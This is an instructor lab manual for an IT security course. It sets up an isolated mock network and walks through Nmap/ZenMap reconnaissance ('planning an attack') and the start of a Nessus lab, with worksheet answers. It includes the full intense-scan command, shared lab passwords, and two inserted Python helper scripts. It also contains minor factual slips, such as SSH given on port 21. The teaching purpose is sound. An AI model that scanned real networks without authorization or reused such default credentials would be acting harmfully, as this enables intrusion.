LabManualITT255
235 Pages


Course Number: IT 255, Spring 2013

College/University: ITT Tech Flint

Word Count: 32064


Instructor Lab Manual
IT255 Fundamentals of Information Systems Security

Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010

Contents

ISS Curriculum Overview ... 5
Ethics and Code of Conduct ... 6
ISS Mock IT Infrastructure ... 7
Laboratory #1 ... 11
  Lab #1: Perform Reconnaissance & Probing Using ZenMap GUI (Nmap) ... 11
  Learning Objectives and Outcomes ... 11
  Required Setup and Tools ... 11
  Recommended Procedures ... 14
  Deliverables ... 18
  Evaluation Criteria and Rubrics ... 18
  Lab #1 Assessment Worksheet ... 19
Laboratory #2 ... 22
  Lab #2: Perform a Vulnerability Assessment Scan Using Nessus ... 22
  Learning Objectives and Outcomes ... 22
  Required Setup and Tools ... 22
  Recommended Procedures ... 25
  Deliverables ... 38
  Evaluation Criteria and Rubrics ... 38
  Lab #2 Assessment Worksheet ... 40
Laboratory #3 ... 43
  Lab #3: Enable Windows Active Directory and User Access Controls ... 43
  Learning Objectives and Outcomes ... 43
  Required Setup and Tools ... 43
  Recommended Procedures ... 44
  Deliverables ... 48
  Evaluation Criteria and Rubrics ... 48
  Lab #3 Assessment Worksheet ... 49
Laboratory #4 ... 52
  Lab #4: Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA) ... 52
  Learning Objectives and Outcomes ... 52
  Required Setup and Tools ... 52
  Recommended Procedures ... 53
  Deliverables ... 57
  Evaluation Criteria and Rubrics ... 58
  Lab #4 Assessment Worksheet ... 59
Laboratory #5 ... 61
  Lab #5: Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator ... 61
  Learning Objectives and Outcomes ... 61
  Required Setup and Tools ... 61
  Recommended Procedures ... 63
  Deliverables ... 70
  Evaluation Criteria and Rubrics ... 70
  Lab #5 Assessment Worksheet ... 71
Laboratory #6 ... 73
  Lab #6: Perform Business Continuity Plan Implementation Planning ... 73
  Learning Objectives and Outcomes ... 73
  Required Setup and Tools ... 73
  Recommended Procedures ... 73
  Deliverables ... 77
  Evaluation Criteria and Rubrics ... 77
  Lab #6 Business Recovery Strategy Assessment Spreadsheet ... 79
  Lab #6 Assessment Worksheet ... 80
Laboratory #7 ... 84
  Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity ... 84
  Learning Objectives and Outcomes ... 84
  Required Setup and Tools ... 84
  Recommended Procedures ... 85
  Deliverables ... 90
  Evaluation Criteria and Rubrics ... 90
  Lab #7 Assessment Worksheet ... 91
Laboratory #8 ... 93
  Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities ... 93
  Learning Objectives and Outcomes ... 93
  Required Setup and Tools ... 93
  Recommended Procedures ... 94
  Deliverables ... 101
  Evaluation Criteria and Rubrics ... 101
  Lab #8 Assignment Worksheet ... 103
  Lab #8 Assessment Worksheet ... 104
Laboratory #9 ... 107
  Lab #9: Perform a Virus Scan and Malware Identification Scan and Eliminate Threats ... 107
  Learning Objectives and Outcomes ... 107
  Required Setup and Tools ... 107
  Recommended Procedures ... 108
  Deliverables ... 112
  Evaluation Criteria and Rubrics ... 112
  Lab #9 Assessment Worksheet ... 113
Laboratory #10 ... 116
  Lab #10: Craft an Information Systems Security Policy ... 116
  Learning Objectives and Outcomes ... 116
  Required Setup and Tools ... 116
  Recommended Procedures ... 116
  Deliverables ... 121
  Evaluation Criteria and Rubrics ... 121
  Lab #10 Assessment Worksheet ... 122

ISS Curriculum Overview

The Bachelor of Science degree in Information Systems Security (ISS) is comprised of twelve foundational courses, each of which has 10 labs. The students will perform paper-based labs (design, configuration, or analysis) and hands-on labs using real equipment, security tools, and applications. The ISS curriculum is comprised of the following courses:

The introductory level courses, identified in red above, have paper-based labs with some accompanying hands-on labs. The security practitioner courses, in green above, have substantial, hands-on lab exercises requiring students to be proficient with hardware, software, tools, and applications commonly found within the seven domains of a typical IT infrastructure. The IS427 Capstone Project course is the final course that the ISS student takes prior to graduating from the program. This course encompasses all the accumulated knowledge obtained from the entire ISS curriculum and requires the student to respond to an RFP for information systems security consulting.

Ethics and Code of Conduct

Students enrolled in the ISS curriculum are aware that the hardware, software, tools, and applications presented and used within the ISS curriculum are for instructional and educational purposes only. The students are not to use these tools, applications, or techniques on live production IT infrastructures. Under no circumstances shall they use the tools, applications, or techniques on ITT Technical Institute or the production IT infrastructures and networks of other organizations. Students enrolled in the ISS curriculum are required to conform to ITT's Code of Conduct described in the student manual as well as the institution's general and specific policies.

ISS Mock IT Infrastructure

The ISS Mock IT infrastructure was designed to mimic a real-world IT infrastructure consisting of the seven domains of a typical IT infrastructure.

Figure IN1: Seven Domains of Information Systems Security Responsibility

The ISS Mock IT infrastructure consists of the following three major components:
- Cisco Core Backbone Network
- VM Server Farm
- VM Instructor and Student Workstations

At the core of the ISS Mock IT infrastructure is a Cisco core backbone network using the CNS curriculum equipment (Cisco 2811/2801 routers, ASA5505s, and Catalyst 2950/2960 switches). The use of the Cisco core backbone network for both CNS and ISS provides a real-world representation of a typical IT infrastructure. This also requires proper preparation and loading of IOS image files and configuration files into/from the Cisco router and a TFTP server. Some ISS courses and labs require the use of the Cisco core backbone network when an IP network infrastructure is needed as part of the hands-on lab activity. This will be indicated in the Required Setup & Tools section of each laboratory within each ISS course lab manual. Onsite students will perform hands-on labs using this Cisco core backbone network and the VM server farm and VM workstations. Online students will watch video-only labs when the Cisco core backbone network is used and will perform hands-on labs using the VM server farm and VM workstations.

Figure 1: ISS Mock IT Infrastructure

The second component is the virtualized server farm. This virtualized (VM) server farm (A) consists of Microsoft Windows and Ubuntu Linux servers running native, as well as open source and freeware, applications and services. The purpose of the VM server farm is to mimic production services and applications, where the instructor has full control over the implementation of the VM server farm based on what the lab requires. Future ISS courses will have new VMs containing pertinent applications and tools. Note that the VM server farm can connect to either ASA_Instructor or ASA_Student as long as the DHCP host range and IP default gateway router definitions are set properly. See Figure IN2 below.

The third component is the Instructor (B) VM workstation and Student VM workstations (C) with client applications and tools pre-installed. See Figure IN2 below.

The following notes are implementation recommendations:
- Install the VM server farm (A) and VM workstations (B and C) on either ASA_Instructor or ASA_Student, as long as you specify the correct IP network lease address pool on the DHCP server and the correct IP default gateway router definition.
- The DHCP server, WindowsDHCP01, is already pre-configured to support the 172.30.0.0, 255.255.255.0 / ASA_Instructor subnet with an IP default gateway router of 172.30.0.1, 255.255.255.0.
- Install the VM server farm on a dedicated classroom workstation with 2 Gig RAM (required) / 4 Gig RAM (recommended).

Figure IN2: VM Server Farm and VM Workstations

To support the delivery of the ISS curriculum, the ITT Technical Institute's Microsoft software licenses are used where needed for Microsoft server and workstation VMs. The VM server farm is physically housed on a USB hard drive, allowing for physical installation on a dedicated VM server farm workstation. All student workstations must be physically isolated from the rest of the classroom workstations because some ISS courses and hands-on labs require disconnection from the ITT internal network. The ISS hands-on labs require the instructor or student to install their hard drive into a physical workstation in the classroom. VMware Player v3.x is used to enable the VM servers and/or VM workstations. Use of a DHCP server provides all IP host addresses to the VM workstations. Ideally, the VM server farm workstation should have 4 Gig of RAM in order to load and run more than 2 VM servers. The Instructor and Student VM workstations can have 2 Gig RAM to load the VM workstation with applications and tools.

Figure 1 shows a high-level diagram of the Mock IT Infrastructure representing both the network and server elements. Do not connect the Mock IT infrastructure to the internal ITT Technical Institute network or public Internet. Special partitioning and separation of those classroom workstations used for ISS hands-on labs is required because intrusive applications and tools are used by ISS hands-on labs. The VM server farm should be connected to the layer 2 switch along with the Instructor VM and Student VM workstations. From here you can run an RJ45-RJ45 trunk cable connecting the layer 2 switch to ASA_Instructor (this is the default configuration using 172.30.0.0/24). This way the VM server farm and DHCP server can be accessed by either the Instructor or Student VM workstations.

The default DHCP settings are:
- 172.30.0.0/24 (IP Network Number with 255.255.255.0 Subnet Mask)
- 172.30.0.1 /25 (IP Default Gateway Router)
- 172.30.0.55 - 172.30.0.199 (DHCP Address Lease Pool)

Note: It is recommended that you isolate the necessary classroom workstations on their own layer 2 switch, and then connect the VM server farm and Instructor VM to this same layer 2 switch. This will facilitate fast and easy connectivity to ASA_Instructor via an RJ45 patch cable/trunk cable. This is shown in Figure 1 previously.
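The implementation notes above stress that the VM server farm only works when the DHCP lease pool and the default gateway match the subnet the VMs are attached to. The following Python script is an added example, not part of the lab manual, that checks a proposed scope against those rules using the manual's default values (network 172.30.0.0/24, gateway 172.30.0.1, lease pool 172.30.0.55 to 172.30.0.199). It goes slightly beyond the notes by also treating the gateway and the WindowsDHCP01 server at 172.30.0.10 as static addresses that must stay outside the pool; that reserved-host list, and the /24 mask applied to the gateway (taken from the 255.255.255.0 given elsewhere in the notes), are the example's own assumptions.

```python
import ipaddress

# Values taken from the lab manual's default Mock IT Infrastructure configuration.
DEFAULT_NETWORK = "172.30.0.0/24"
DEFAULT_GATEWAY = "172.30.0.1"
DEFAULT_POOL = ("172.30.0.55", "172.30.0.199")
# Static hosts that must never be handed out as leases (assumption for this
# example: the default gateway and the DHCP server itself).
DEFAULT_RESERVED = {
    "172.30.0.1": "ASA_Instructor (default gateway)",
    "172.30.0.10": "WindowsDHCP01 (DHCP server)",
}


def check_dhcp_scope(network, gateway, pool, reserved=None):
    """Return a list of configuration problems; an empty list means the scope is consistent."""
    reserved = reserved or {}
    problems = []
    net = ipaddress.ip_network(network, strict=True)
    gw = ipaddress.ip_address(gateway)
    start, end = (ipaddress.ip_address(a) for a in pool)

    # 1. The default gateway must be an address inside the subnet the clients use,
    #    otherwise leased hosts cannot reach it without a route.
    if gw not in net:
        problems.append(f"gateway {gw} is not inside {net}")

    # 2. The lease pool must be a non-empty range inside the subnet and must not
    #    include the network or broadcast address, which cannot be leased to hosts.
    if start > end:
        problems.append(f"lease pool start {start} is after end {end}")
    for edge in (start, end):
        if edge not in net:
            problems.append(f"lease pool boundary {edge} is outside {net}")
    if start == net.network_address or end == net.broadcast_address:
        problems.append("lease pool includes the network or broadcast address")

    # 3. Statically assigned hosts must not fall inside the dynamic pool, or the
    #    DHCP server will eventually hand out a duplicate of their address.
    for addr, role in reserved.items():
        ip = ipaddress.ip_address(addr)
        if ip not in net:
            problems.append(f"reserved host {addr} ({role}) is outside {net}")
        if start <= ip <= end:
            problems.append(f"reserved host {addr} ({role}) lies inside the lease pool")

    return problems


def lease_pool_size(pool):
    """Number of addresses the DHCP server can lease from the given pool."""
    start, end = (ipaddress.ip_address(a) for a in pool)
    return int(end) - int(start) + 1


if __name__ == "__main__":
    issues = check_dhcp_scope(DEFAULT_NETWORK, DEFAULT_GATEWAY, DEFAULT_POOL, DEFAULT_RESERVED)
    for line in issues or ["scope OK"]:
        print(line)
    print("leases available:", lease_pool_size(DEFAULT_POOL))
```

Run it before attaching the server farm to ASA_Student instead of ASA_Instructor: change the network, gateway and pool arguments to the values you intend to configure on WindowsDHCP01 and the script reports every mismatch instead of leaving you to discover it when ping to the gateway fails in step 3 of the lab.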
Note: The latest version of the ISS Mock IT Infrastructure Installation & Setup Guide (in PDF format, file ISS Mock IT Infrastructure_v 3 7_101006_dk final.pdf) can be found in two different locations:
- The www.jblearning.com\ITT instructor portal: the ISS Mock IT Infrastructure Installation and Setup Guide can be found in each course's \Labs sub-folder as follows: \ISxxx\Labs\Mock IT Infrastructure\..., where xxx = ISS Course Number
- The ITT Faculty Portal: the Mock IT Infrastructure Installation and Setup Guide can be found here: \ITT Faculty Portal\IT Shared Documents\ISS\Mock Infrastructure Setup v3.7\...

Laboratory #1

Lab #1: Perform Reconnaissance & Probing Using ZenMap GUI (Nmap)

Learning Objectives and Outcomes

Upon completing this lab, students will be able to perform the following tasks:
- Obtain, access, and copy the Virtual Machines (server farm and workstations) needed for IT255 onto your removable hard drive
- Use VMware Player to enable and power up the VMs (server farm and workstations) needed for this hands-on lab
- Plan an initial reconnaissance and probing attack on the ISS Mock IT Infrastructure
- Use ZenMap GUI (Nmap) to perform an Intense Scan on the entire targeted ISS Mock IT Infrastructure 172.30.0.0/24
- Generate a ZenMap GUI (Nmap) port scanning report and submit it as part of your hands-on lab deliverables

Required Setup and Tools

This lab requires the use of the ITT Mock IT Infrastructure and Virtualized Server Farm.

Figure 1: ISS Onsite Mock IT Infrastructure & Virtualized Server Farm

The Mock IT Infrastructure is a preconfigured IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP-addressing schema, VLAN configurations, and layer 2/3 switching are pre-configured. The IP networking infrastructure remains static and only needs the following removable parts:

A) A classroom workstation (with at least 2 Gig RAM, 4 Gig RAM recommended) capable of supporting a removable hard drive containing the virtualized server farm. This classroom workstation will support the virtualized server farm and connects to the same layer 2 switch as the Instructor and Student VM workstations. This layer 2 switch is then connected to ASA_Instructor for entry into the IP networking infrastructure via an RJ45 trunk cable (refer to Figure 1) using 172.30.0.1 255.255.255.0 as the IP default gateway router.

B) An instructor workstation (with at least 2 Gig RAM) that shall act as the instructor's demo VM workstation. He/she will display the Instructor VM workstation on the LCD projector to demonstrate enabling and powering the VM server farm and VM workstation and for performing the hands-on lab.

C) The student classroom workstations, isolated on a layer 2 switch for connectivity to the ISS Mock IT Infrastructure via a trunk cable to ASA_Instructor. These workstations will support the Student VM workstation and Target VM servers locally.

The following summarizes the setup, configuration, and equipment needed to perform Lab #1:

1. Standard ISS Mock IT infrastructure and virtualized server farm configuration and setup, which consist of the following components:
   a. Cisco 2801 routers, 2960 Catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs
2. A Virtualized Server Farm with the following components:
   a. Microsoft DHCP server for allocating student IP host addresses
   b. A Student and/or Instructor VM workstation
3. Target VMs as described by the lab:
   a. Windows 2003 Server Standard Edition: Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
      o Computer Name: Windows02
      o Three Users Available: administrator, instructor or student (case sensitive)
      o Password: ISS316Security
      o IP Address: DHCP
      o Domain Login: NO
      FTP (Filezilla FTP Server)
      o Port: 21
      o Username: instructor or student
      o Password:
      TFTP (Tftpd32 TFTP Server)
      o Port: 69
      o Username:
      o Password:
   b. Ubuntu Desktop 9.10 Linux: Ubuntu Linux 9.10 Desktop Edition (VM Name: TargetUbuntu02)
      o Computer Name: Ubuntu02
      o Two Users Available: instructor or student
      o Password: ISS316Security (case sensitive)
      o IP Address: DHCP
   c. Ubuntu Server 10.04 Linux: Target Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01)
      o Computer Name: Ubuntu01
      o ONE User available ONLY: administrator
      o Password: ISS316Security (case sensitive)
      o IP Address: eth0 set to DHCP, eth1 and eth2 not set.
      SSH
      o Port: 21
      o Username: administrator
      o Password:
      Apache running Damn Vulnerable Web App (DVWA)
      o URL: http:///dvwa
      o Username: admin
      o Password: password
4. Security and CLI tools
5. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab:
   a. VMware Player 3.x
   b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Recommended Procedures

Instructor Demo Lab #1:

The instructor will load VMware Player and demonstrate how to add and remove VMs from the VMware Library, as well as how to copy and back up the necessary VMware files. The instructor will also give the students a tour of the VM servers and the pre-loaded applications and tools on the student VM workstations. Finally, the instructor will demonstrate how to run a ZenMap GUI (Nmap) Intense Scan on the local 172.30.0.0/24 subnet, performing the following:
- IP Discovery
- IP Hosts Summary
- Ports and Services Available on Hosts
- Complete IP Subnet Intense Scan

The instructor will review the results of the Intense Scan with the class, displaying the results on the overhead projector for questions from the class.

Hands-on Lab #1 Instructor Steps:

The Instructor will perform the following demonstration:
1. Connect the instructor removable hard drive to your workstation
2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address
3. Enable your DOS command prompt and type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
4. Connect your instructor workstation to the LCD projector and show the VMware Player library and how to add, remove and copy VMs to and from the library and the local computer
5. Log into the Instructor VM and, if you are working with a 4GB RAM workstation, start the three Target VMs: Windows01, Ubuntu01 and Ubuntu02.
   Login ID: instructor or student (case sensitive)
   Password: ISS316Security (case sensitive)
   NOTE: If the workstations in your physical classroom have only 2GB of RAM, then only two VMs can be powered on at once. You have to split the VM server farm across 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance.

Figure 2: VMware Player with Virtualized Server Farm

6. The Instructor VM is just like the Student VM in regards to what applications are loaded; give the students a tour of each of the applications loaded:
   a. PuTTY for Telnet and SSH
   b. Filezilla for FTP
   c. tftpd32 for TFTP
   d. Wireshark for packet capture and protocol analysis
   e. Netwitness Investigator for packet importing and protocol analysis
   f. Nessus for vulnerability assessment scanning
   g. ZenMap GUI for IP discovery, port and services scanning
7. Engage the DOS command prompt on the Instructor VM and PING various IP hosts and the default gateway, which is the ASA_Instructor 172.30.0.1
8. Run the PuTTY application from the Instructor VM and TELNET or SSH to the ASA_Instructor (172.30.0.1), LAN.SW1 (172.16.8.5), LAN.SW2 (172.20.8.5), WestCovina (172.20.8.1), and Norfolk (172.16.8.1) routers
9. When you connect to a Cisco switch or router, enter the user name of cisco and terminal console password of cisco, and then type show ip route and show run to display the Cisco core backbone network's configuration
10. Log into the WindowsTarget01 VM server, and show the class the pre-loaded applications and tools that will be used in this course
11. Log into the TargetUbuntu01 Linux server and TargetUbuntu02 Linux desktop, and show the students the server and workstation
12. From the Instructor VM desktop, enable ZenMap GUI and load the Nmap application
13. Perform a Ping Scan or Quick Scan on 172.30.0.0/24 to identify all the hosts on the local subnetwork
14. Perform an Intense Scan on 172.30.0.0/24, and capture the results in the Nmap report
15. Review the results with the class on the overhead projector, and answer any questions

Hands-on Lab #1 Student Steps:

This lab will introduce the students to applications and tools commonly used by hackers and information systems security practitioners. Ethical hacking, penetration testing, and security assessments will be discussed as they learn how to perform reconnaissance and probing tasks. For this lab, the students will perform the following steps:
1. Connect the student removable hard drive to your workstation
2. Boot up the Student VM, and obtain an IP address from the DHCPWindows01 VM server connected to the same layer 2 switch as your student VM workstation
3. Enable your DOS command prompt and type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
   NOTE: If the workstations in your physical classroom have only 2GB of RAM, then only two VMs can be powered on at once. You only need to power on your Student VM workstation, since the DHCP server is part of the VM server farm.

Figure 2: VMware Player with Virtualized Server Farm

4. The Student VM workstation has the following pre-loaded applications and tools, which will be used throughout this course and other ISS curriculum courses:
   a. PuTTY for Telnet and SSH
   b. Filezilla for FTP
   c. tftpd32 for TFTP
   d. Wireshark for packet capture and protocol analysis
   e. Netwitness Investigator for packet importing and protocol analysis
   f. Nessus for vulnerability assessment scanning
   g. ZenMap GUI for IP discovery, port and services scanning
5. Enable your DOS command prompt and type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
6. Run the PuTTY application from the Instructor VM and TELNET or SSH to the ASA_Instructor (172.30.0.1), LAN.SW1 (172.16.8.5), LAN.SW2 (172.20.8.5), WestCovina (172.20.8.1), and Norfolk (172.16.8.1) routers
7. When you connect to a Cisco switch or router, enter the user name of cisco and terminal console password of cisco. Then type show ip route and show run to display the Cisco core backbone network's configuration
8. From the Student VM desktop, enable ZenMap GUI, and load the Nmap application
9. Perform a Ping Scan or Quick Scan on 172.30.0.0/24 to identify all the hosts on the local subnetwork
10. Perform an Intense Scan on 172.30.0.0/24, and capture the results in the Nmap report
11. Save the results of your Intense Scan, and submit them as part of your lab deliverables

Deliverables

Upon completion of this lab, the students are required to submit the following deliverables as part of this lab:
1. Lab #1 Softcopy of the ZenMap GUI Intense Scan report performed
2. Lab #1 Assessment Questions & Answers

Evaluation Criteria and Rubrics

The following are the evaluation criteria and rubrics for Lab #1 that the students must perform:
1. Was the student able to obtain, access and copy the Virtual Machines (server farm and workstations) needed for IT255 onto their removable hard drive? [20%]
2. Was the student able to use VMware Player to enable and power up the VMs (server farm and workstations) needed for this hands-on lab? [20%]
3. Was the student able to plan an initial reconnaissance and probing attack on the ISS Mock IT Infrastructure? [20%]
4. Was the student able to use ZenMap GUI (Nmap) to perform an Intense Scan on the entire targeted ISS Mock IT Infrastructure 172.30.0.0/24? [20%]
5. Was the student able to generate a ZenMap GUI (Nmap) port scanning report and submit it as part of their hands-on lab deliverables? [20%]
Lab #1 Assessment Worksheet
Perform Reconnaissance & Probing Using ZenMap GUI (Nmap)

Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
Lab Due Date: _______________________________________________________________________

Overview

Hackers traditionally follow a 5-step approach to seek out and destroy targeted hosts. The first step in performing an attack is to plan the attack by identifying your target and learning as much as possible about the target. Hackers traditionally perform an initial reconnaissance & probing scan to identify IP hosts, open ports, and services enabled on servers and workstations. In this lab, students will plan an attack on 172.30.0.0/24 where the VM server farm resides. Using ZenMap GUI, students will then perform a Ping Scan or Quick Scan on the targeted IP subnetwork.

Lab Assessment Questions & Answers

1. Name at least five applications and tools pre-loaded on the Windows 2003 Server Target VM (VM Name: WindowsTarget01) and identify whether that application starts as a service on the system or must be run manually?

   Windows Applications Loaded    Starts as Service Y/N
   1. Splunk                      Y
   2. Putty                       N
   3. Nessus                      Y
   4. tftpd32                     Y
   5. Filezilla FTP               Y
   6. There are others            Y/N

2. What was the DHCP allocated source IP host address for the Student VM, DHCP Server, and IP default gateway router?
   At the DOS Command Prompt, type ipconfig to display the IP address of your Student VM workstation. After you ping other devices, you can display the ARP cache in your Student VM workstation by typing arp -a to obtain the answer to this question.

3. Did the targeted IP hosts respond to the ICMP echo-request packet with an ICMP echo-reply packet when you initiated the ping command at your DOS prompt? If yes, how many ICMP echo-request packets were sent back to the IP source?
   Four (4)

4. If you ping the WindowsTarget01 VM server and the UbuntuTarget01 VM server, which fields in the ICMP echo-request / echo-replies vary?
   At least one: TTL (Time to Live). Windows Servers have a TTL of 128 and Ubuntu Linux Servers use a TTL of 64.

5. What is the command line syntax for running an Intense Scan with ZenMap on a target subnet of 172.30.0.0/24?
   nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.30.0.0/24

6. Name at least 5 different scans that may be performed from the ZenMap GUI and document under what circumstances you would choose to run those particular scans.
   a. Intense Scan: A thorough scan of all well-known TCP ports and services, identifying well-known services such as FTP, HTTP, etc.
   b. Intense Scan plus UDP: Same as Intense Scan but scans the well-known port numbers using the UDP protocol as well as TCP, which detects services such as tftp, DNS, etc.
   c. Intense Scan, All TCP Ports: This scan will detect all running TCP services on all available ports 0-65535; this is chosen when you want the scan to detect running services on high ports
   d. Ping Scan: A very quick scan that is designed to simply ping all addresses on a given network, identifying which hosts are alive and responding to pings
   e. Slow Comprehensive Scan: A thorough scan that is designed to bypass IDS systems and not set off any alarms due to how slow it scans; more time-consuming but much more stealthy

7. How many different tests (i.e., scripts) did your Intense Scan definition perform? List them all after reviewing the scan report.
   36. Students are required to submit a softcopy of the Intense Scan results.
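The Intense Scan report students save from ZenMap GUI is an Nmap XML file. Added here as an example (it is not part of the lab manual or of Nmap), this Python script reads such a report and lists the live hosts, their open ports and services, the OS guess and the NSE scripts that ran; the embedded report is constructed for the example and the set of cleartext services it flags is an assumption.

```python
"""Summarise an Nmap XML report (Zenmap: Scan > Save Scan, or nmap -oX).
Added example for this lab page; the embedded report is constructed,
not captured from the lab network."""
import xml.etree.ElementTree as ET

# Constructed sample: two live hosts and one silent address.  The element layout
# (nmaprun/host/status, address, ports/port, os, hostscript) follows Nmap's XML output.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.30.0.0/24">
<host><status state="up" reason="arp-response"/>
<address addr="172.30.0.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
<service name="ftp" product="FileZilla ftpd" version="0.9.33"/></port>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/>
<service name="msrpc" product="Microsoft Windows RPC"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
<service name="microsoft-ds" product="Microsoft Windows 2003 microsoft-ds"/></port>
<port protocol="tcp" portid="3389"><state state="closed" reason="reset"/>
<service name="ms-term-serv"/></port>
</ports>
<os><osmatch name="Microsoft Windows Server 2003 SP1 or SP2" accuracy="100"/></os>
<hostscript><script id="smb-os-discovery" output="OS: Windows Server 2003 (constructed)"/></hostscript>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="172.30.0.8" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="5.3p1"/>
<script id="ssh-hostkey" output="2048 (RSA) constructed fingerprint"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.2.14"/>
<script id="http-title" output="Ubuntu Server (constructed)"/></port>
</ports>
<os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
</host>
<host><status state="down" reason="no-response"/>
<address addr="172.30.0.9" addrtype="ipv4"/></host>
<runstats><hosts up="2" down="254" total="256"/></runstats>
</nmaprun>"""

# Services that send credentials in cleartext; worth flagging before the
# Lab #2 Nessus scan.  The set itself is an assumption for this example.
CLEARTEXT_SERVICES = {"ftp", "telnet", "tftp"}


def parse_report(xml_text):
    """Return one dict per host that Nmap reported as up."""
    root = ET.fromstring(xml_text)  # only parse reports you generated yourself
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") == "ipv4"), "unknown")
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not services to review
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v) if svc is not None else ""
            open_ports.append({"port": int(port.get("portid")),
                               "proto": port.get("protocol"),
                               "service": name, "product": product})
        osmatch = host.find("os/osmatch")  # first (best) OS match, if any
        hosts.append({"ip": ip, "open_ports": open_ports,
                      "os": osmatch.get("name") if osmatch is not None else "unknown",
                      "scripts": sorted({s.get("id") for s in host.iter("script")})})
    return hosts


def scripts_run(xml_text):
    """Distinct NSE script ids that produced output anywhere in the report."""
    return sorted({s.get("id") for s in ET.fromstring(xml_text).iter("script")})


def cleartext_exposures(hosts):
    """(ip, port, service) for every open service in CLEARTEXT_SERVICES."""
    return [(h["ip"], p["port"], p["service"]) for h in hosts
            for p in h["open_ports"] if p["service"] in CLEARTEXT_SERVICES]


def summarize(xml_text):
    """Plain-text summary: live hosts, their open ports, scripts run, exposures."""
    hosts = parse_report(xml_text)
    lines = [f"Live hosts: {len(hosts)}"]
    for h in hosts:
        lines.append(f"{h['ip']}  OS guess: {h['os']}")
        for p in h["open_ports"]:
            lines.append(f"    {p['port']}/{p['proto']} {p['service']} {p['product']}".rstrip())
    lines.append("NSE scripts run: " + ", ".join(scripts_run(xml_text)))
    for ip, port, svc in cleartext_exposures(hosts):
        lines.append(f"Cleartext service {svc} on {ip}:{port}: review it in the Nessus scan")
    return "\n".join(lines)
```

Call summarize() on the text of a saved report, or on SAMPLE_XML to see the layout.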
8. Describe what each of these tests or scripts performs within the ZenMap GUI (Nmap) scan report.
   ARP Ping Scan: ping scan to identify active IP hosts
   SYN Stealth Scan: equivalent of an open port scan on active IP hosts
   OS Detection Scan: operating system fingerprint scan to identify the OS of the server or workstation
   Service Scan: services scan for enabled applications and services on identified servers and workstations

9. How many total IP hosts (not counting Cisco device interfaces) did ZenMap GUI (Nmap) find on the network?
   You should have captured all the Student VM workstations and the Instructor VM workstation on the layer 2 switch plus the 4 VM servers

10. Based on your Nmap scan results and initial reconnaissance & probing, what next steps would you perform on the VM server farm and VM workstation targets?
   Using the IP hosts, open ports, and services/applications identified, a vulnerability assessment scan would be the next step in an effort to identify software vulnerabilities and exploits in targeted services and workstations.

Laboratory #2

Lab #2: Perform a Vulnerability Assessment Scan Using Nessus
(Nessus is a Registered Trademark of Tenable Network Security, Inc.)

Learning Objectives and Outcomes

Upon completing this lab, students will be able to complete the following tasks:
o Identify risks, threats, and vulnerabilities in an IP network infrastructure using ZenMap GUI (Nmap) to perform an IP host, port, and services scan
o Perform a vulnerability assessment scan on a targeted IP subnetwork using Nessus
o Compare the results of the ZenMap GUI Intense Scan with a Nessus vulnerability assessment scan
o Assess the findings of the vulnerability assessment scan and identify critical vulnerabilities
o Make recommendations for mitigating the identified risks, threats, and vulnerabilities as described on the CVE database listing

Required Setup and Tools

This lab requires the use of the ISS Mock IT Infrastructure and Virtualized Server Farm.

Figure 1 ISS Onsite Mock IT Infrastructure & Virtualized Server Farm

The Mock IT Infrastructure and Virtualized Server Farm is a preconfigured IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP addressing schema, VLAN configurations, and layer 3 switching are preconfigured. The IP networking infrastructure remains static and only needs the following removable parts:
A) A classroom workstation (with at least 4 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the ASA_Instructor VLAN
B) An instructor workstation (with at least 2 Gig RAM) that shall act as the instructor's demonstration LAB workstation. The instructor will display the instructor workstation on the LCD projector to demonstrate the loading and configuring of the ISS Mock IT Infrastructure and Server Farm with VMware Player
C) Students' LAB workstations will use a local copy of the ISS Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs

The following summarizes the setup, configuration, and equipment needed to perform Lab #2:
1. Standard ITT Mock IT Infrastructure and Virtualized Server Farm configuration and setup
   a. Cisco 2801 routers, 2960 catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs
